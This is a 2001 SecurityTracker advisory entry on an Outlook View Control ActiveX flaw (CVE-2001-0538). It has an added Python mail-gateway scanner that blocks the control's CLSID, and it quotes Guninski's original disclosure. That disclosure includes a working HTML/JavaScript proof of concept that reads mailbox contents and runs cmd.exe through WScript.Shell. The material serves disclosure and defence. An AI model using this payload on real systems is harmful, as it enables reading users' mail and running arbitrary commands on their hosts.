SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Microsoft Outlook
Vendors:   Microsoft
Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
SecurityTracker Alert ID:  1001984
SecurityTracker URL:  http://securitytracker.com/id/1001984
CVE Reference:   CVE-2001-0538
Updated:  Jul 15 2001
Original Entry Date:  Jul 12 2001
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): Outlook 98, 2000 or 2002
Description:   Georgi Guninski issued an advisory for Microsoft Outlook (part of Office XP), warning that it allows a web page or HTML-based e-mail message to cause arbitrary commands to be executed on the user's host.

The vulnerability is reportedly due to a vulnerable ActiveX control "Microsoft Outlook View Control" that is apparently installed by Outlook. This control reportedly exposes a property named "selection", which gives access to the user's mail messages, and the Outlook "Application" object, which allows commands to be executed on the user's host.

Impact:   A web page or HTML-based e-mail message could cause arbitrary commands to be executed on the user's host with the privileges of the user. This could also cause the user's e-mail to be viewed, modified, and/or deleted.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Access control error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Microsoft Issues Fix) Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
The vendor has released a fix.
(Microsoft Issues Updated Fix) Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host
The vendor has released an updated fix.
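
Added example (not part of the SecurityTracker entry or of the advisory): a mail-gateway style check that flags HTML parts instantiating the Outlook View Control, matched on the CLSID quoted in the source message below. The function names and the sample message are constructed for illustration; the scanner tolerates case, brace, whitespace and character-reference variations in the classid attribute and decodes base64 or quoted-printable parts before scanning.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# CLSID of the "Microsoft Outlook View Control", as given in the advisory.
BLOCKED_CLSIDS = {"0006f063-0000-0000-c000-000000000046"}

def normalize_classid(value):
    """Reduce a classid attribute to a bare lowercase GUID, or None."""
    m = re.fullmatch(r"\s*clsid\s*:\s*\{?([0-9a-f-]{36})\}?\s*", value or "", re.I)
    return m.group(1).lower() if m else None

class ObjectTagScanner(HTMLParser):
    """Collects <object> tags whose classid is on the block list."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names and unescapes values.
        if tag != "object":
            return
        attrs = dict(attrs)
        guid = normalize_classid(attrs.get("classid"))
        if guid in BLOCKED_CLSIDS:
            self.hits.append({"clsid": guid, "id": attrs.get("id")})

def scan_html(html):
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits

def scan_message(raw_bytes):
    """Scan every text/html part of an RFC 822 message (transfer-decoded)."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits.extend(scan_html(part.get_content()))
    return hits

def constructed_sample():
    """Constructed test message: base64 HTML part with only the <object> tag."""
    m = EmailMessage()
    m["Subject"] = "constructed test message"
    m.set_content("plain part")
    m.add_alternative('<p>hi</p><OBJECT ID="v"\n CLASSID="CLSID:{0006f063-0000-0000-c000-000000000046}"></OBJECT>', subtype="html", cte="base64")
    return m.as_bytes()
```

A hit from `scan_message` is a reason to quarantine or strip the part; a clean result only means this one control was not referenced by classid.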



 Source Message Contents

Subject:  MS Office XP vulnerability


Georgi Guninski security advisory #49, 2001 

MS Office XP - the more money I give to Microsoft, the more vulnerable
my Windows computers are 

Systems affected: 
Win2K + IE 5.5 SP1 fully patched + Office XP. 
It was reported to work with IE6 beta also. 

Risk: High 
Date: 12 July 2001 

Legal Notice: 
This Advisory is Copyright (c) 2001 Georgi Guninski. 
You may distribute it unmodified. 
You may not modify it and distribute it or distribute parts 
of it without the author's written permission. 

Disclaimer: 
The information in this advisory is believed to be true based on 
experiments though it may be false. 
The opinions expressed in this advisory and program are my own and 
not of any company. The usual standard disclaimer applies, 
especially the fact that Georgi Guninski is not liable for any damages 
caused by direct or  indirect use of the information or functionality 
provided by this advisory or program. Georgi Guninski bears no 
responsibility for content or misuse of this advisory or program or 
any derivatives thereof. 

If you want to link to this advisory or reference it use the URL: 
http://www.guninski.com/vv2xp.html 
The above especially applies for companies like Mitre and BugNet 

Background: 

Recently I bought Office XP. 
It was quite unpleasant feeling giving so much money for so buggy 
product. 

Description: 

If a user visits a specially designed html page with IE or opens or 
previews a message with Outlook XP arbitrary commands may be 
executed on his computer. This may lead to taking full control over 
user's computer. 
Using another approach to this bug allows reading, modifying and 
deleting messages in user's Outlook XP folders. 
                     

Details: 
The problem is again ActiveX. This time Office XP seems to install a 
malicious ActiveX control - "Microsoft Outlook View Control". 
This control exposes property named "selection" which gives access to 
user's mail messages. It also exposes the Outlook "Application" object 
which may lead to execution of arbitrary programs of the user's computer. 
Examine the script below for more information. 

Demonstration: 
http://www.guninski.com/vv3-2demo.html 
----------------------------------------------------- 
This assumes you have at least one message in Outlook XP's Inbox 
<br> 
<object id="o1" 
classid="clsid:0006F063-0000-0000-C000-000000000046" 
> 
<param name="folder" value="Inbox"> 
</object> 

<script> 
function f() 
{ 
//alert(o2.object); 
sel=o1.object.selection; 
vv1=sel.Item(1); 
alert("Subject="+vv1.Subject); 
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]"); 
alert("May be deleted"); 
//vv1.Delete(); 

vv2=vv1.Session.Application.CreateObject("WScript.Shell"); 

alert("Much more fun is possible"); 
                     

vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ "); 

} 
setTimeout("f()",2000); 
</script> 
----------------------------------------------------- 
                     

Solution: 
Uninstall Office XP and Windows. 

Vendor status: 
Microsoft was informed on 9 July 2001. 
As far as I could understand they are still investigating my report. 
                     

Regards, 
Georgi Guninski 
http://www.guninski.com


 
 

